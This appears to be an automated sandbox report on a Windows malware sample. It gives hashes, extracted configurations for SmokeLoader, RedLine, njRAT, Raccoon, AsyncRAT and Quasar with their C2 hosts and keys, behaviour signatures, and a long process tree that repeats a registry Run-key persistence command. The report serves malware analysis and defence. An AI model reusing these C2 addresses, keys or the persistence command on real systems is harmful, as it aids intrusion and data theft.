Analysis

  • max time kernel
    30s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-en
  • submitted
    07-09-2021 00:51

General

  • Target

    daa924a51f13b11f37dac4ed05098052357d6c78816e121c9105c118692bd1a2.exe

  • Size

    247KB

  • MD5

    207bb33577d0f8f3831a45858138d96b

  • SHA1

    7a4f99fa0a75a6ddcab1901de445b3b2f4ea3267

  • SHA256

    daa924a51f13b11f37dac4ed05098052357d6c78816e121c9105c118692bd1a2

  • SHA512

    09b757069da156ffcb046ffb88562ef216b14a00ad125c8f8bdf4024a35158fe98dadff9b549e7ed933796a70594a4f4f3d65eedbd9506ae658c2fdb81f035ed

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://fazanaharahe1.xyz/

http://xandelissane2.xyz/

http://ustiassosale3.xyz/

http://cytheriata4.xyz/

http://ggiergionard5.xyz/

http://rrelleynaniy6.store/

http://danniemusoa7.store/

http://nastanizab8.store/

http://onyokandis9.store/

http://dmunaavank10.store/

http://gilmandros11.site/

http://cusanthana12.site/

http://willietjeana13.site/

http://ximusokall14.site/

http://blodinetisha15.site/

http://urydiahadyss16.club/

http://glasamaddama17.club/

http://marlingarly18.club/

http://alluvianna19.club/

http://xandirkaniel20.club/

rc4.i32
rc4.i32

Extracted

Family

redline

C2

45.14.49.232:14970

Extracted

Family

njrat

C2

62.33.159.162:5674

Mutex

26c50014115b430

Attributes
  • reg_key

    26c50014115b430

  • splitter

    @!#&^%$

Extracted

Family

raccoon

Botnet

c0a9feb2a4e39ae5dc9126aeda03d4a8d900a1bf

Attributes
  • url4cnc

    https://telete.in/hotcarzooncon

rc4.plain
rc4.plain

Extracted

Family

asyncrat

Version

0.5.7B

C2

null:null

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • aes_key

    8FA9JRFjWXueotm7qWCj4Zax4AHfQdgS

  • anti_detection

    true

  • autorun

    true

  • bdos

    false

  • delay

    Default

  • host

    null

  • hwid

    3

  • install_file

  • install_folder

    %AppData%

  • mutex

    AsyncMutex_6SI8OkPnk

  • pastebin_config

    https://pastebin.com/raw/JBB6AAZb

  • port

    null

  • version

    0.5.7B

aes.plain

Extracted

Family

quasar

Version

1.4.0

Botnet

Office04

C2

8.tcp.ngrok.io:12199

Mutex

77e1716f-a8ee-4809-837a-f0b960ec437d

Attributes
  • encryption_key

    66E7B222E349FE5DA72098D60610AEAB3132B98F

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Quasar Payload 4 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Async RAT payload 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • XMRig Miner Payload 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 6 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 6 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\daa924a51f13b11f37dac4ed05098052357d6c78816e121c9105c118692bd1a2.exe
    "C:\Users\Admin\AppData\Local\Temp\daa924a51f13b11f37dac4ed05098052357d6c78816e121c9105c118692bd1a2.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4524
    • C:\Users\Admin\AppData\Local\Temp\daa924a51f13b11f37dac4ed05098052357d6c78816e121c9105c118692bd1a2.exe
      "C:\Users\Admin\AppData\Local\Temp\daa924a51f13b11f37dac4ed05098052357d6c78816e121c9105c118692bd1a2.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:3820
  • C:\Users\Admin\AppData\Local\Temp\7A27.exe
    C:\Users\Admin\AppData\Local\Temp\7A27.exe
    1⤵
    • Executes dropped EXE
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:4200
  • C:\Users\Admin\AppData\Local\Temp\7C7A.exe
    C:\Users\Admin\AppData\Local\Temp\7C7A.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4392
    • C:\Users\Admin\AppData\Local\Temp\Ajg9D2tcl.exe
      "C:\Users\Admin\AppData\Local\Temp\Ajg9D2tcl.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2640
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4364
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4464
          • C:\Windows\SysWOW64\cmd.exe
            CMD /C CALL echo y
            5⤵
              PID:5004
          • C:\Windows\SysWOW64\reg.exe
            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
            4⤵
            • Adds Run key to start application
            PID:3944
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
          3⤵
            PID:1288
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
              4⤵
                PID:4532
                • C:\Windows\SysWOW64\cmd.exe
                  CMD /C CALL echo y
                  5⤵
                    PID:316
                • C:\Windows\SysWOW64\reg.exe
                  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                  4⤵
                    PID:5056
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                  3⤵
                    PID:5212
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                      4⤵
                        PID:5672
                        • C:\Windows\SysWOW64\cmd.exe
                          CMD /C CALL echo y
                          5⤵
                            PID:5988
                        • C:\Windows\SysWOW64\reg.exe
                          reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                          4⤵
                            PID:5800
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                          3⤵
                            PID:5832
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                              4⤵
                                PID:6004
                                • C:\Windows\SysWOW64\cmd.exe
                                  CMD /C CALL echo y
                                  5⤵
                                    PID:5352
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                  4⤵
                                    PID:6100
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                  3⤵
                                    PID:6800
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                      4⤵
                                        PID:6776
                                        • C:\Windows\SysWOW64\cmd.exe
                                          CMD /C CALL echo y
                                          5⤵
                                            PID:6916
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                          4⤵
                                            PID:6192
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                          3⤵
                                            PID:6100
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                              4⤵
                                                PID:6756
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  CMD /C CALL echo y
                                                  5⤵
                                                    PID:7208
                                                • C:\Windows\SysWOW64\reg.exe
                                                  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                  4⤵
                                                    PID:5924
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                  3⤵
                                                    PID:7912
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                      4⤵
                                                        PID:7556
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          CMD /C CALL echo y
                                                          5⤵
                                                            PID:4936
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                          4⤵
                                                            PID:1540
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                          3⤵
                                                            PID:7976
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                              4⤵
                                                                PID:196
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  CMD /C CALL echo y
                                                                  5⤵
                                                                    PID:7376
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                  4⤵
                                                                    PID:7328
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                  3⤵
                                                                    PID:7432
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                      4⤵
                                                                        PID:8176
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                        4⤵
                                                                          PID:7444
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                        3⤵
                                                                          PID:1980
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                            4⤵
                                                                              PID:7612
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                              4⤵
                                                                                PID:7604
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  CMD /C CALL echo y
                                                                                  5⤵
                                                                                    PID:7592
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                3⤵
                                                                                  PID:2328
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                    4⤵
                                                                                      PID:7960
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                      4⤵
                                                                                        PID:7388
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          CMD /C CALL echo y
                                                                                          5⤵
                                                                                            PID:8040
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                        3⤵
                                                                                          PID:7996
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                            4⤵
                                                                                              PID:7064
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                              4⤵
                                                                                                PID:7328
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  CMD /C CALL echo y
                                                                                                  5⤵
                                                                                                    PID:4324
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                3⤵
                                                                                                  PID:7424
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                    4⤵
                                                                                                      PID:7536
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                      4⤵
                                                                                                        PID:7492
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          CMD /C CALL echo y
                                                                                                          5⤵
                                                                                                            PID:7272
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                        3⤵
                                                                                                          PID:6252
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                            4⤵
                                                                                                              PID:7800
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                              4⤵
                                                                                                                PID:5760
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  CMD /C CALL echo y
                                                                                                                  5⤵
                                                                                                                    PID:7580
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                3⤵
                                                                                                                  PID:7804
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                    4⤵
                                                                                                                      PID:1736
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                      4⤵
                                                                                                                        PID:2328
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          CMD /C CALL echo y
                                                                                                                          5⤵
                                                                                                                            PID:1828
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                        3⤵
                                                                                                                          PID:6848
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                            4⤵
                                                                                                                              PID:5176
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                              4⤵
                                                                                                                                PID:4324
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  CMD /C CALL echo y
                                                                                                                                  5⤵
                                                                                                                                    PID:1500
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                3⤵
                                                                                                                                  PID:7368
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                    4⤵
                                                                                                                                      PID:7572
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                      4⤵
                                                                                                                                        PID:1396
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          CMD /C CALL echo y
                                                                                                                                          5⤵
                                                                                                                                            PID:6324
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                        3⤵
                                                                                                                                          PID:7424
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                            4⤵
                                                                                                                                              PID:7612
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                CMD /C CALL echo y
                                                                                                                                                5⤵
                                                                                                                                                  PID:4104
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                4⤵
                                                                                                                                                  PID:6860
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                3⤵
                                                                                                                                                  PID:6252
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                    4⤵
                                                                                                                                                      PID:2684
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                      4⤵
                                                                                                                                                        PID:7840
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          CMD /C CALL echo y
                                                                                                                                                          5⤵
                                                                                                                                                            PID:1564
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                        3⤵
                                                                                                                                                          PID:7988
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                            4⤵
                                                                                                                                                              PID:5328
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                CMD /C CALL echo y
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:8128
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:5804
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:7120
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:7112
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        CMD /C CALL echo y
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:5820
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:6704
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:8176
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:6128
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                CMD /C CALL echo y
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:4100
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:3444
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:7244
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:6004
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:1708
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          CMD /C CALL echo y
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:4400
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c START /B CMD /C CALL echo y | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WinAppHost /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\WinAppHost.exe >NUL 2>&1
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:2852
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" START /B CMD /C CALL echo y "
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:6640
